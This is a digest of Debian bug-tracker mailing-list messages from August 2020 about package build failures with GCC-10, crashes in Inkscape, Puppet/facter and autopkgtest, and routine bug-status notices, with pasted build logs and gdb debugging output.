Bug#966671: coturn is marked for autoremoval from testing

2020-08-24 Thread James Cloos
removing the -v (or --verbose) flag from /etc/init.d/coturn fixed this
for me.

-JimC
-- 
James Cloos  OpenPGP: 0x997A9F17ED7DAEA6



Bug#968981: qtfeedback-opensource-src FTBFS: Error copying /<>/doc/qtfeedback to /<>/debian/tmp/usr/share/qt5/doc/qtfeedback: Cannot open /<>/doc/qtfeedback for

2020-08-24 Thread Helmut Grohne
Source: qtfeedback-opensource-src
Version: 5.0~git20180329.a14bd0bb-1
Severity: serious
Tags: ftbfs

qtfeedback-opensource-src fails to build from source. On the buildds, it
failed to build on everything but amd64 and all, where it wasn't
attempted. On a local build on amd64 I see the very same failure:

| make[4]: Entering directory '/<>/src/feedback'
| /usr/lib/qt5/bin/qmake -install qinstall /<>/doc/qtfeedback 
/<>/debian/tmp/usr/share/qt5/doc/qtfeedback
| Error copying /<>/doc/qtfeedback to 
/<>/debian/tmp/usr/share/qt5/doc/qtfeedback: Cannot open 
/<>/doc/qtfeedback for input
| make[4]: *** [Makefile:605: install_inst_html_docs] Error 3
| make[4]: Leaving directory '/<>/src/feedback'
| make[3]: *** [Makefile:412: sub-feedback-install_docs_ordered] Error 2
| make[3]: Leaving directory '/<>/src'
| make[2]: *** [Makefile:347: sub-src-install_docs] Error 2
| make[2]: Leaving directory '/<>'
| make[1]: *** [debian/rules:24: override_dh_auto_install] Error 2
| make[1]: Leaving directory '/<>'
| make: *** [debian/rules:17: binary] Error 2
| dpkg-buildpackage: error: debian/rules binary subprocess returned exit status 
2

Helmut



Bug#968977: autopkgtest: abi-compliance-checker is Perl broken

2020-08-24 Thread Norbert Preining
Package: autopkgtest
Version: 5.13.1
Severity: grave
Justification: renders package unusable

Hi,

seems something creeped into the Perl code base:

autopkgtest [01:32:07]: test acc: [---
Can't "next" outside a loop block at /usr/bin/abi-compliance-checker 
line 10171.

This breaks autopkg tests and build testing pipelines.

Best

Norbert



-- System Information:
Debian Release: bullseye/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.8.3 (SMP w/8 CPU threads)
Kernel taint flags: TAINT_WARN
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_US:en
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages autopkgtest depends on:
ii  apt-utils   2.1.10
ii  libdpkg-perl1.20.5
ii  procps  2:3.3.16-5
ii  python3 3.8.2-3
ii  python3-debian  0.1.37

Versions of packages autopkgtest recommends:
ii  autodep8  0.24

Versions of packages autopkgtest suggests:
pn  lxc   
pn  lxd   
ii  ovmf  2020.05-3
ii  qemu-efi-aarch64  2020.05-3
ii  qemu-efi-arm  2020.05-3
pn  qemu-system   
ii  qemu-utils1:5.1+dfsg-3
ii  schroot   1.6.10-9+b1
pn  vmdb2 

-- no debconf information



Processed: Bug#937062 marked as pending in mod-wsgi

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> tag -1 pending
Bug #937062 [src:mod-wsgi] mod-wsgi: Python2 removal in sid/bullseye
Added tag(s) pending.

-- 
937062: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=937062
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#937062: marked as pending in mod-wsgi

2020-08-24 Thread Emmanuel Arias
Control: tag -1 pending

Hello,

Bug #937062 in mod-wsgi reported by you has been fixed in the
Git repository and is awaiting an upload. You can see the commit
message below and you can check the diff of the fix at:

https://salsa.debian.org/python-team/modules/mod-wsgi/-/commit/bf5bd011eb0f6cdb4a7452a25b3992066dabd128


Remove py2 support. Closes: #937062

Remove the need to install old package. Closes: #968079


(this message was generated automatically)
-- 
Greetings

https://bugs.debian.org/937062



Processed: Bug#968079 marked as pending in mod-wsgi

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> tag -1 pending
Bug #968079 [libapache2-mod-wsgi] libapache2-mod-wsgi: Package is not 
installable. Needs older Python2.
Added tag(s) pending.

-- 
968079: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968079
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968079: marked as pending in mod-wsgi

2020-08-24 Thread Emmanuel Arias
Control: tag -1 pending

Hello,

Bug #968079 in mod-wsgi reported by you has been fixed in the
Git repository and is awaiting an upload. You can see the commit
message below and you can check the diff of the fix at:

https://salsa.debian.org/python-team/modules/mod-wsgi/-/commit/bf5bd011eb0f6cdb4a7452a25b3992066dabd128


Remove py2 support. Closes: #937062

Remove the need to install old package. Closes: #968079


(this message was generated automatically)
-- 
Greetings

https://bugs.debian.org/968079



Bug#968756: Further Info

2020-08-24 Thread Bernhard Übelacker
Hello Jason,
thanks for the information, just some notes before.
You might want to  use reply all, otherwise the answer
might get through unnoticed.
And for some reason your email did not convert sufficiently
to plain text for some reason, so it appears kind of
short at https://bugs.debian.org/968756 .



On Sun, 23 Aug 2020 01:31:46 +0200 pub1...@gmx.com wrote:
> 
> Dear Maintainers,
> 
> @Mattia:
>  
> > Since you tried the AppImage and reproduced with that as well, could you
> > consider filing a bug report upstream directly at
> > https://gitlab.com/inkscape/inbox ?
>  
> Will do.
>  
> > Also, I'm uploading now 1.0-5 to backports, if you could see whether
> > that also triggers this crash it would be useful (1.0-2 disable a bunch
> > of asserts that might or might not be relevant)
>  
> Have just upgraded it now. I'll do my best at triggering the error again and
> keep you posted with strace info.
>  
> Regards,
> Jason
>  
>  
>  
> @Bernhard:
>  
> > one small additional note. The dmesg lines you provided would have been
> > followed by lines "Code:". With that line it would be possible to
> > find at least the current instruction and source code line when the
> > executables are from the debian archive and the package version is
> > known. So please do not strip these lines away.
>  
> Sorry, I didn't strip them on purpose, I just grep'd for 'inkscape'. My bad.
> Anyway, I dug into the dmesg log and isolated the info you requested:
>  
>  e9 c3 fc ff ff e8 05 45 5a ff 48 89 c3 e9 99 0a 69 ff 48 89 c3 e9 87 0a 69 ff
>  90 0f 1f 40 00 53 48 8d 87 48 01 00 00 48 89 fb <48> 39 87 48 01 00 00 74 3c
>  80 bb 39 01 00 00 00 74 0b 31 c0 5b c3
> 
> Regards,
> Jason
> 

This line points to function below.

But proper backtraces might still be needed to be able to find the reason.
You probably could install systemd-coredump - then minimal backtrace
should be visible in 'journalctl -e' after a chrash.
Plus a core would be generated for later inspection.

And if Thunar crashes too, are there also a segfault line?

Kind regards,
Bernhard



(gdb) info b
Num Type   Disp Enb AddressWhat
2   breakpoint keep y   0x778e55db in 
Avoid::Router::processTransaction() at /usr/include/c++/8/bits/stl_list.h:1063

(gdb) disassemble Avoid::Router::processTransaction
Dump of assembler code for function Avoid::Router::processTransaction():
   0x778e55d0 <+0>: push   %rbx
   0x778e55d1 <+1>: lea0x148(%rdi),%rax
   0x778e55d8 <+8>: mov%rdi,%rbx
-->0x778e55db <+11>:cmp%rax,0x148(%rdi)
   0x778e55e2 <+18>:je 0x778e5620 

   0x778e55e4 <+20>:cmpb   $0x0,0x139(%rbx)
...

benutzer@debian:~$ cat -n /usr/include/c++/8/bits/stl_list.h | grep 1063 -B7 -A2
  1056
  1057// [23.2.2.2] capacity
  1058/**
  1059 *  Returns true if the %list is empty.  (Thus begin() would equal
  1060 *  end().)
  1061 */
  1062bool
  1063empty() const _GLIBCXX_NOEXCEPT
  1064{ return this->_M_impl._M_node._M_next == >_M_impl._M_node; 
}
  1065



640 bool Router::processTransaction(void)
641 {
642 // If SimpleRouting, then don't update here.
643 if ((actionList.empty() && (m_hyperedge_rerouter.count() == 0) &&
644  (m_settings_changes == false)) || SimpleRouting)
645 {

https://gitlab.com/inkscape/inkscape/-/blob/INKSCAPE_1_0/src/3rdparty/adaptagrams/libavoid/router.cpp#L643







# Buster amd64 qemu VM 2020-08-24


apt update
apt dist-upgrade


# add backports and debug symbols from local approx cache:
deb  http://192.168.178.25:/debian-10-buster-security.debian.org/ 
buster/updates main
deb-src  http://192.168.178.25:/debian-10-buster-security.debian.org/ 
buster/updates main
deb  http://192.168.178.25:/debian-10-buster-debug.deb.debian.org/ 
buster-debug  main contrib non-free
deb  http://192.168.178.25:/debian-10-buster-debug.deb.debian.org/ 
buster-proposed-updates-debug main contrib non-free
deb  http://192.168.178.25:/debian-10-buster-debug.deb.debian.org/ 
buster-backports-debugmain contrib non-free

apt update


apt install systemd-coredump mc libstdc++-8-dev gdb inkscape/buster-backports
# Installs 1.0-5~bpo10+1 from two days ago ...

wget 
https://snapshot.debian.org/archive/debian/20200527T144641Z/pool/main/i/inkscape/inkscape_1.0-1%7Ebpo10%2B1_amd64.deb
wget 
https://snapshot.debian.org/archive/debian-debug/20200527T144324Z/pool/main/i/inkscape/inkscape-dbgsym_1.0-1%7Ebpo10%2B1_amd64.deb
dpkg -i inkscape_1.0-1~bpo10+1_amd64.deb inkscape-dbgsym_1.0-1~bpo10+1_amd64.deb



# https://wiki.debian.org/InterpretingKernelOutputAtProcessCrash

echo -n "find /b ..., ..., 0x" && \
echo "e9 c3 fc ff ff e8 05 45 5a ff 48 89 c3 e9 99 0a 69 ff 48 89 c3 e9 87 0a 
69 ff 90 0f 1f 40 00 53 

Bug#962692: [Pkg-puppet-devel] Bug#962692: puppet: Crashes due to "missing" facts.d directories

2020-08-24 Thread Apollon Oikonomopoulos
Control: reassign -1 facter
Control: merge -1 962784

Hi and thanks for the report!

Wilmer van der Gaast  writes:

> Package: puppet
> Version: 5.5.19-1
> Severity: grave
> Justification: renders package unusable
>
>
> Since the recent Ruby upgrade, Puppet invocations have been very noisy for a
> while already.
>
> But by now it's not even starting. Even after a dpkg -P including most
> dependencies (including apt-get remove ruby.*) then reinstalling, all I
> get is:
>
> wilmer@veer:~/adsb$ sudo puppet agent --waitforcert 60 -t
> /usr/lib/ruby/vendor_ruby/puppet/util.rb:461: warning: URI.escape is
> obsolete
> /usr/lib/ruby/vendor_ruby/puppet/file_system/file_impl.rb:80: warning: Using
> the last argument as keyword parameters is deprecated
> free(): invalid pointer
> Aborted
>
This is a facter issue, as outlined in #962784. I'm reassigning this bug
to facter and merging with #962784.

Regards,
Apollon



Processed: Re: [Pkg-puppet-devel] Bug#962692: puppet: Crashes due to "missing" facts.d directories

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> reassign -1 facter
Bug #962692 [puppet] puppet: Crashes due to "missing" facts.d directories
Bug reassigned from package 'puppet' to 'facter'.
No longer marked as found in versions puppet/5.5.19-1.
Ignoring request to alter fixed versions of bug #962692 to the same values 
previously set
> merge -1 962784
Bug #962692 [facter] puppet: Crashes due to "missing" facts.d directories
Bug #962692 [facter] puppet: Crashes due to "missing" facts.d directories
Marked as found in versions facter/3.11.0-4.1.
Bug #962784 [facter] facter aborts with free(): invalid pointer
Merged 962692 962784

-- 
962692: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=962692
962784: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=962784
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#967915: Depends on geda-gaf

2020-08-24 Thread Gregor Riepl
> geda-gaf is scheduled for removal (#965098) and gspiceui depends on it.
> 
> Quoting Bdale in the RM bug above:
>  It looks like the last gspiceui upstream release was in late 2018, and
>  the only reason it depends on geda-gaf is that it wants to use gnetlist
>  to import schematic data from gschem.  Updating that to use
>  lepton-netlist to import schematic data from lepton-schematic should be
>  a pretty simple search and replace operation if keeping gspiceui seems
>  worthwhile (I don't know, I've never used it).

I'd prefer that gspiceui be kept. I don't care much for gEDA and if the
dependency isn't strictly necessary or can be replaced with
lepton-netlist, I'm all for it.

As a matter of fact, it looks like there is already code in place to
search for lepton-netlist in addition to gnetlist:
https://salsa.debian.org/science-team/gspiceui/-/blob/master/src/TypeDefs.hpp#L112-130

It should be enough to replace the dependencies on geda-gschem and
geda-gnetlist with lepton-eda.



Bug#957151: marked as done (drbd-utils: ftbfs with GCC-10)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 22:03:31 +
with message-id 
and subject line Bug#957151: fixed in drbd-utils 9.13.1-1
has caused the Debian Bug report #957151,
regarding drbd-utils: ftbfs with GCC-10
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
957151: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957151
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:drbd-utils
Version: 9.11.0-1
Severity: normal
Tags: sid bullseye
User: debian-...@lists.debian.org
Usertags: ftbfs-gcc-10

Please keep this issue open in the bug tracker for the package it
was filed for.  If a fix in another package is required, please
file a bug for the other package (or clone), and add a block in this
package. Please keep the issue open until the package can be built in
a follow-up test rebuild.

The package fails to build in a test rebuild on at least amd64 with
gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
severity of this report will be raised before the bullseye release,
so nothing has to be done for the buster release.

The full build log can be found at:
http://people.debian.org/~doko/logs/gcc10-20200225/drbd-utils_9.11.0-1_unstable_gcc10.log
The last lines of the build log are at the end of this report.

To build with GCC 10, either set CC=gcc-10 CXX=g++-10 explicitly,
or install the gcc, g++, gfortran, ... packages from experimental.

  apt-get -t=experimental install g++ 

Common build failures are new warnings resulting in build failures with
-Werror turned on, or new/dropped symbols in Debian symbols files.
For other C/C++ related build failures see the porting guide at
http://gcc.gnu.org/gcc-10/porting_to.html

[...]
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdmeta.o 
../shared/drbdmeta.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdmeta_scanner.o 
../shared/drbdmeta_scanner.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbd_strings.o 
../../drbd-headers/drbd_strings.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdmeta_linux.o 
../shared/drbdmeta_linux.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdsetup.o drbdsetup.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o wrap_printf.o 
../shared/wrap_printf.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdsetup_colors.o 
drbdsetup_colors.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2  -c -o drbdsetup_linux.o 
drbdsetup_linux.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-z,relro -Wl,-z,now  
-Wl,-z,relro -Wl,-z,now -o drbdadm drbdadm_scanner.o drbdadm_parser.o 
drbdadm_postparse.o drbdadm_main.o drbdadm_adjust.o drbdadm_dump.o 
drbdtool_common.o drbdadm_usage_cnt.o drbd_buildtag.o registry.o config_flags.o 
libnla.o drbd_nla.o shared_tool.o shared_main.o shared_parser.o libgenl.o 
drbdadm_linux.o drbdtool_common_linux.o
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-z,relro -Wl,-z,now  
-Wl,-z,relro -Wl,-z,now -o drbdmeta drbdmeta.o drbdmeta_scanner.o 
drbdtool_common.o drbd_buildtag.o drbd_strings.o shared_tool.o drbdmeta_linux.o 
drbdtool_common_linux.o
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wall -I../../drbd-headers -I.. -I. 
-I../shared  -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-z,relro -Wl,-z,now  

Bug#957294: marked as done (gnushogi: ftbfs with GCC-10)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 21:49:05 +
with message-id 
and subject line Bug#957294: fixed in gnushogi 1.4.2-7
has caused the Debian Bug report #957294,
regarding gnushogi: ftbfs with GCC-10
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
957294: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957294
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:gnushogi
Version: 1.4.2-6
Severity: normal
Tags: sid bullseye
User: debian-...@lists.debian.org
Usertags: ftbfs-gcc-10

Please keep this issue open in the bug tracker for the package it
was filed for.  If a fix in another package is required, please
file a bug for the other package (or clone), and add a block in this
package. Please keep the issue open until the package can be built in
a follow-up test rebuild.

The package fails to build in a test rebuild on at least amd64 with
gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
severity of this report will be raised before the bullseye release,
so nothing has to be done for the buster release.

The full build log can be found at:
http://people.debian.org/~doko/logs/gcc10-20200225/gnushogi_1.4.2-6_unstable_gcc10.log
The last lines of the build log are at the end of this report.

To build with GCC 10, either set CC=gcc-10 CXX=g++-10 explicitly,
or install the gcc, g++, gfortran, ... packages from experimental.

  apt-get -t=experimental install g++ 

Common build failures are new warnings resulting in build failures with
-Werror turned on, or new/dropped symbols in Debian symbols files.
For other C/C++ related build failures see the porting guide at
http://gcc.gnu.org/gcc-10/porting_to.html

[...]
 1137 | else if ((Captured[c2][p] && color[u]) == neutral)
  |^~
../../gnushogi/eval.c: In function ‘AttackedPieceValue’:
../../gnushogi/eval.c:1268:14: warning: variable ‘ds’ set but not used 
[-Wunused-but-set-variable]
 1268 | short s, ds;
  |  ^~
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -c ../../gnushogi/genmove.c
gcc  -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -c ../../gnushogi/init.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -DPATTERNFILE=\"../../misc/gnushogi.pat\" -c 
../../gnushogi/makepattern.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -c ../../gnushogi/pat2inc.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -o pat2inc globals.o init-common.o pattern-common.o 
makepattern.o pat2inc.o -Wl,-z,relro -lcurses -lm
./pat2inc
Pattern: 2102 bytes for 14 sequences with 128 patterns.

gcc  -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -c ../../gnushogi/pattern.c
gcc -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong 
-Wformat -Werror=format-security -DHASHFILE=\"/usr/lib/gnushogi/gnushogi.hsh\" 
-fsigned-char -funroll-loops -Wall -Wno-implicit-int -Wstrict-prototypes -ansi 
-pedantic -I. -I.. -I../.. -c ../../gnushogi/rawdsp.c
../../gnushogi/rawdsp.c: In function ‘Raw_help’:
../../gnushogi/rawdsp.c:316:51: warning: format ‘%d’ expects argument of type 
‘int’, but argument 3 has type ‘long int’ [-Wformat=]
  316 | printf("Depth:%-12d Response time:   %d sec\n",
  |  ~^
  |   |
  |   int
 

Bug#957355: marked as done (ifplugd: ftbfs with GCC-10)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 20:35:41 +
with message-id 
and subject line Bug#957355: fixed in ifplugd 0.28-19.5
has caused the Debian Bug report #957355,
regarding ifplugd: ftbfs with GCC-10
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
957355: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957355
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:ifplugd
Version: 0.28-19.4
Severity: normal
Tags: sid bullseye
User: debian-...@lists.debian.org
Usertags: ftbfs-gcc-10

Please keep this issue open in the bug tracker for the package it
was filed for.  If a fix in another package is required, please
file a bug for the other package (or clone), and add a block in this
package. Please keep the issue open until the package can be built in
a follow-up test rebuild.

The package fails to build in a test rebuild on at least amd64 with
gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
severity of this report will be raised before the bullseye release,
so nothing has to be done for the buster release.

The full build log can be found at:
http://people.debian.org/~doko/logs/gcc10-20200225/ifplugd_0.28-19.4_unstable_gcc10.log
The last lines of the build log are at the end of this report.

To build with GCC 10, either set CC=gcc-10 CXX=g++-10 explicitly,
or install the gcc, g++, gfortran, ... packages from experimental.

  apt-get -t=experimental install g++ 

Common build failures are new warnings resulting in build failures with
-Werror turned on, or new/dropped symbols in Debian symbols files.
For other C/C++ related build failures see the porting guide at
http://gcc.gnu.org/gcc-10/porting_to.html

[...]
checking pkg-config is at least version 0.9.0... yes
checking for LIBDAEMON_CFLAGS... -D_REENTRANT
checking for LIBDAEMON_LIBS... -ldaemon
configure: *** Init sript will be installed in /etc/init.d ***
configure: creating ./config.status
config.status: creating src/Makefile
config.status: creating Makefile
config.status: creating man/Makefile
config.status: creating conf/Makefile
config.status: creating doc/Makefile
config.status: creating doc/README.html
config.status: creating patches/Makefile
config.status: creating ifplugd.spec
config.status: creating config.h
config.status: executing depfiles commands
make[1]: Leaving directory '/<>'
   dh_auto_build
make -j1
make[1]: Entering directory '/<>'
make  all-recursive
make[2]: Entering directory '/<>'
Making all in src
make[3]: Entering directory '/<>/src'
make  all-am
make[4]: Entering directory '/<>/src'
gcc -DHAVE_CONFIG_H -I. -I. -I..   -Wdate-time -D_FORTIFY_SOURCE=2 -D_REENTRANT 
-DSYSCONFDIR="\"/etc\"" -D_GNU_SOURCE -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -pipe -W -Wall -Wno-unused-parameter -c ifplugd.c
In file included from /usr/include/string.h:495,
 from ifplugd.c:28:
In function ‘strncpy’,
inlined from ‘is_iface_available’ at ifplugd.c:379:5:
/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: 
‘__builtin_strncpy’ specified bound 16 equals destination size 
[-Wstringop-truncation]
  106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
  |  ^~
gcc -DHAVE_CONFIG_H -I. -I. -I..   -Wdate-time -D_FORTIFY_SOURCE=2 -D_REENTRANT 
-DSYSCONFDIR="\"/etc\"" -D_GNU_SOURCE -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -pipe -W -Wall -Wno-unused-parameter -c interface.c
In file included from /usr/include/string.h:495,
 from interface.c:31:
In function ‘strncpy’,
inlined from ‘interface_detect_beat_wlan’ at interface.c:300:5:
/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: 
‘__builtin_strncpy’ specified bound 16 equals destination size 
[-Wstringop-truncation]
  106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
  |  ^~
In function ‘strncpy’,
inlined from ‘get_wlan_qual_new’ at interface.c:243:5,
inlined from ‘interface_detect_beat_wlan’ at interface.c:313:14:
/usr/include/x86_64-linux-gnu/bits/string_fortified.h:106:10: warning: 
‘__builtin_strncpy’ specified bound 16 equals destination size 
[-Wstringop-truncation]
  106 |   return __builtin___strncpy_chk (__dest, __src, __len, __bos (__dest));
  |  ^~
In function ‘strncpy’,
inlined from 

Bug#960265: marked as done (s390x install Debootstrap warning: Failure while configuring base packages. s390-tools depends on perl:any.)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 19:52:43 +
with message-id 
and subject line Bug#960265: fixed in s390-tools 2.3.0-2~deb10u1
has caused the Debian Bug report #960265,
regarding s390x install Debootstrap warning: Failure while configuring base 
packages. s390-tools depends on perl:any.
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
960265: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=960265
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---

package: s390-tools

Version: current Installer from 04.05.2020 21:14 
http://ftp.halifax.rwth-aachen.de/debian/dists/buster/main/installer-s390x/current/images/generic/


When I install debian I run in this Problem (from console 4):

May 11 09:43:43 debootstrap: Errors were encountered while processing:
May 11 09:43:43 debootstrap:  s390-tools
May 11 09:43:44 debootstrap: dpkg: dependency problems prevent 
configuration of s390-tools:

May 11 09:43:44 debootstrap:  s390-tools depends on perl:any.
May 11 09:43:44 debootstrap:
May 11 09:43:44 debootstrap: dpkg: error processing package s390-tools 
(--configure):

May 11 09:43:44 debootstrap:  dependency problems - leaving unconfigured

Installation failed in step install base system.
--- End Message ---
--- Begin Message ---
Source: s390-tools
Source-Version: 2.3.0-2~deb10u1
Done: Philipp Kern 

We believe that the bug you reported is fixed in the latest version of
s390-tools, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 960...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Philipp Kern  (supplier of updated s390-tools package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 17 Aug 2020 10:04:45 +0200
Source: s390-tools
Architecture: source
Version: 2.3.0-2~deb10u1
Distribution: buster
Urgency: medium
Maintainer: Debian S/390 Team 
Changed-By: Philipp Kern 
Closes: 960265
Changes:
 s390-tools (2.3.0-2~deb10u1) buster; urgency=medium
 .
   * Upload debootstrap fix to Debian stable. (Closes: #960265)
Checksums-Sha1:
 c49460fef9a618f12e24e3a3e96b8d3673738984 1764 s390-tools_2.3.0-2~deb10u1.dsc
 b773fd0cda4348ce7bde263ea0d4393b7eafe9fd 10484 
s390-tools_2.3.0-2~deb10u1.debian.tar.xz
 e759aa082449ec2a0a5e00e25e844c7571186d4b 6432 
s390-tools_2.3.0-2~deb10u1_source.buildinfo
Checksums-Sha256:
 a5f9b83bd995473b53c1f7cc7bd742e8cc76857347864ff6a15f5d348d7c12c8 1764 
s390-tools_2.3.0-2~deb10u1.dsc
 36d8b5959e58983c01929369b23079baf47ca540da5f9ccd9852723b39b3a34f 10484 
s390-tools_2.3.0-2~deb10u1.debian.tar.xz
 d31c89a45eb493bd2bc2c842a25a751e9c788e9b3add51658f783b5b469c5b7d 6432 
s390-tools_2.3.0-2~deb10u1_source.buildinfo
Files:
 1f2f3aa813fa79108199a1bb370006e8 1764 admin important 
s390-tools_2.3.0-2~deb10u1.dsc
 11b6ecc528ca8806a8843b2d28678432 10484 admin important 
